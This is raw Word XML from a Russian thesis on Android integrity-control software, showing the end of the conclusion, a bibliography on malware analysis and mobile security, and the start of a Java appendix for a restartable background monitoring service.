        <w:t>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мобильных устройств на операционной системе андроид в виде перезапускаемого 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E11CE6" w:rsidRDefault="00535073" w:rsidP="00E11CE6">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r w:rsidR="00E11CE6" w:rsidRPr="00E11CE6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00535073" w:rsidRDefault="00E11CE6" w:rsidP="00E11CE6">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Таким образом</w:t>
      </w:r>
      <w:r w:rsidR="00E10E50">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>предустановка разработанного в данной работе программного обеспечения контроля целостности ин</w:t>
      </w:r>
      <w:r w:rsidR="00E10E50">
        <w:t xml:space="preserve">формации предполагается в основном на корпоративные устройства, используемые в рабочих целях, с согласия держателя мобильного персонального устройства. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D41FE" w:rsidRDefault="000C0933" w:rsidP="000F60D4">
      <w:pPr>
        <w:pStyle w:val="14"/>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p>
    <w:p w:rsidR="009D41FE" w:rsidRDefault="009D41FE">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00E70973">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc61505578"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>СПИСОК ИСПОЛЬЗОВАННЫХ ИСТОЧНИКОВ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRPr="00BF03B6" w:rsidRDefault="000853C0" w:rsidP="004A5FE1">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF03B6">
        <w:t>Монаппа К. А. Анализ вредоносных программ / пер. с англ. Беликова Д. А. – М.: ДМК Пресс, 2019. – 452с.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRPr="00BF03B6" w:rsidRDefault="000853C0" w:rsidP="00BF03B6">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF03B6">
        <w:t xml:space="preserve">[Электронный ресурс]: Positive Technologies. – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidR="00977D58" w:rsidRPr="00BF03B6">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>https://www.ptsecurity.com/ru-ru/research/analytics/financial-application-vulnerabilities-2018/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001E447A">
        <w:rPr>
          <w:rStyle w:val="ae"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF03B6">
        <w:t>(дата обращения 15.10.2020)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRPr="00BF03B6" w:rsidRDefault="000853C0" w:rsidP="00BF03B6">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF03B6">
        <w:t xml:space="preserve">[Электронный ресурс]: Smart Security. URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidR="00977D58" w:rsidRPr="00BF03B6">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>https://bosfera.ru/pdf/16.%20%D0%A0%D0%B8%D0%BD%D0%B0%D1%82%20%D0%90%D0%BD%D0%B8%D1%81%D0%B8%D0%BC%D0%BE%D0%B2.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00977D58" w:rsidRPr="00BF03B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF03B6">
        <w:t>(дата обращения 18.10.2020)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRPr="00BF03B6" w:rsidRDefault="000853C0" w:rsidP="00BF03B6">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF03B6">
        <w:t xml:space="preserve">[Электронный ресурс]: Википедия. Свободная энциклопедия. – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidR="00977D58" w:rsidRPr="00BF03B6">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>https://ru.wikipedia.org/wiki/Android</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Statcounter GlobalStats. – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidR="00977D58" w:rsidRPr="00BF03B6">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>https://gs.statcounter.com/os-market-share</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00977D58" w:rsidRPr="00BF03B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF03B6">
        <w:t xml:space="preserve">(дата обращения 21.10.2020) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRPr="00BF03B6" w:rsidRDefault="000853C0" w:rsidP="00BF03B6">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF03B6">
        <w:t xml:space="preserve">[Электронный ресурс]: Википедия. Свободная энциклопедия. – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidR="00977D58" w:rsidRPr="00BF03B6">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>https://ru.wikipedia.org/wiki/IOS</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Википедия. Свободная энциклопедия. – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidR="00977D58" w:rsidRPr="00BF03B6">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>https://ru.wikipedia.org/wiki/Windows_10_Mobile</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Anti-Malware. – URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidR="00977D58" w:rsidRPr="00BF03B6">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:color w:val="auto"/>
            <w:u w:val="none"/>
          </w:rPr>
          <w:t>https://www.anti-malware.ru/analytics/Threats_Analysis/principles_detection_malicious_applications_Android</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00977D58" w:rsidRPr="00BF03B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF03B6">
        <w:t>(дата обращения 22.10.2020)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRPr="00BF03B6" w:rsidRDefault="000853C0" w:rsidP="00BF03B6">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="001E4D1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">T. Garfinkel and M. Rosenblum. A Virtual Machine Introspection Based Architecture for Intrusion Detection. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF03B6">
        <w:t>10-я конференция Annual Network &amp; Distributed System Security Symposium (NDSS), 2003</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRPr="00BF03B6" w:rsidRDefault="000853C0" w:rsidP="00BF03B6">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="001E4D1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">W. Enck, P. Gilbert, B.-G. Chunn, L. P. Cox, J. Jung, P. McDaniel, and A. N. Sheth. TaintDroid: An Information-Flow Tracking System for Realtime Privacy Monitoring on Smartphones. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF03B6">
        <w:t>9-я конференция USENIX. Симпозиум по дизайну и применению операционных систем 2010</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRPr="001E4D1C" w:rsidRDefault="000853C0" w:rsidP="00BF03B6">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E4D1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>G. Sarwar, O. Mehani, R. Boreli, and M. A. Kaafar. On the Effectiveness of Dynamic Taint Analysis for Protecting Against Private Information Leaks on Androidbased Devices. 10-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF03B6">
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="001E4D1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF03B6">
        <w:t>международная</w:t>
      </w:r>
      <w:r w:rsidRPr="001E4D1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF03B6">
        <w:t>конференция</w:t>
      </w:r>
      <w:r w:rsidRPr="001E4D1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> International Conference on Security and Cryptography (SECRYPT), 2013</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRPr="00BF03B6" w:rsidRDefault="000853C0" w:rsidP="00BF03B6">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r w:rsidRPr="001E4D1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Y. Zhang, M. Yang, B. Xu, Z. Yang, G. Gu, P. Ning, X. Wang, B. Zang. Vetting Undesirable Behaviors in Android Apps with Permission Use Analysis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF03B6">
        <w:t>20-я конференцияACM Conference on Computer and Communications Security (CCS), 2013</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00BF03B6">
      <w:pPr>
        <w:pStyle w:val="a0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E4D1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I. Burguera, U. Zurutuza, S. Nadjm-Tehrani. Crowdroid: Behavior-Based Malware Detection System for Android. 1-</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF03B6">
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="001E4D1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF03B6">
        <w:t>конференция</w:t>
      </w:r>
      <w:r w:rsidRPr="001E4D1C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ACM workshop on Security and privacy in smartphones and mobile devices, 2011</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847C79"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3" w:history="1">
        <w:r w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ru</w:t>
        </w:r>
        <w:r w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>wikipedia</w:t>
        </w:r>
        <w:r w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>org</w:t>
        </w:r>
        <w:r w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>wiki</w:t>
        </w:r>
        <w:r w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t>/.</w:t>
        </w:r>
        <w:r w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>NET</w:t>
        </w:r>
        <w:r w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t>_</w:t>
        </w:r>
        <w:r w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Core</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (дата обращения 10.01.2021)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00096345"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4" w:history="1">
        <w:r w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t>https://ru.wikipedia.org/wiki/React</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00096345">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(дата обращения 10.01.2021)</w:t>
      </w:r>
      <w:r w:rsidRPr="00096345">
        <w:t xml:space="preserve"> </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5" w:history="1">
        <w:r w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t>https://ru.wikipedia.org/wiki/Internet_Information_Services</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6" w:history="1">
        <w:r w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t>https://ru.wikipedia.org/wiki/Android_Studio</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7" w:anchor="Visual_Studio_2019" w:history="1">
        <w:r w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t>https://ru.wikipedia.org/wiki/Microsoft_Visual_Studio#Visual_Studio_2019</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (дата обращения 10.01.2021)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00096345" w:rsidRDefault="00096345" w:rsidP="00AF32A4">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Электронный ресурс]: Википедия. Свободная энциклопедия. – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:history="1">
        <w:r w:rsidR="00AF32A4" w:rsidRPr="00E7362C">
          <w:rPr>
            <w:rStyle w:val="ae"/>
          </w:rPr>
          <w:t>https://ru.wikipedia.org/wiki/Visual_Studio_Code</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AF32A4" w:rsidRPr="00AF32A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(дата обращения 10.01.2021)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D41FE" w:rsidRDefault="009D41FE">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0054048E" w:rsidRDefault="00DE6727" w:rsidP="00E70973">
      <w:pPr>
        <w:pStyle w:val="110"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc61505579"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidR="00753BE3">
        <w:t>РИЛОЖЕНИЕ А</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w:rsidR="001E447A" w:rsidRPr="001E447A" w:rsidRDefault="001E447A" w:rsidP="001E447A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E447A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Исходный код возобновляемого сервиса</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB60A5" w:rsidRPr="00F870DF" w:rsidTr="00DB60A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10195" w:type="dxa"/>
          </w:tcPr>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roofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="0033B3"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">package </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>com.behavioralanalysis.service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android.app.Activity</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android.app.AlarmManager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android.app.PendingIntent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android.content.ContentResolver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android.content.pm.PackageInfo</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android.os.Bundle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android.provider.Settings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android.widget.Toast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androidx.annotation.</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="9E880D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Nullable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androidx.core.app.ActivityCompat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androidx.core.content.ContextCompat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java.util.ArrayList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public class </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">MainActivity </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="0033B3"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">extends </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">Activity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public static final </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="871094"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">CHANNEL_ID </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"exampleServiceChannel"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9E880D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>@Override</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="9E880D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="0033B3"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">protected void </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="00627A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>onCreate</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="9E880D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">@Nullable </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">Bundle </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>savedInstanceState)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super</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>.onCreate(savedInstanceState);</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createNotificationChannel();</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setContentView(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>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layout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activity_main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requestNotificationPermissionIfNeed();</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">        requestPermissionIfNeed();</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&amp;&amp; getNotGrantedPermissions().isEmpty())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Intent serviceIntent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MainService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PendingIntent </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">pendingIntent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getForegroundService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AlarmManager alarmManager </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>=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)getSystemService(</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="871094"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>ALARM_SERVICE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.setRepeating(</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ELAPSED_REALTIME_WAKEUP</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10000</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>, pendingIntent);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finish();</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boolean </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="00627A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>checkNotificationService</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ContentResolver contentResolver </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>= getContentResolver();</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enabledNotificationListeners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Secure</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getString</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contentResolver</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"enabled_notification_listeners"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packageName </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>= getPackageName();</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 xml:space="preserve">enabledNotificationListeners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null </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="080808"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">&amp;&amp; </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB60A5">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
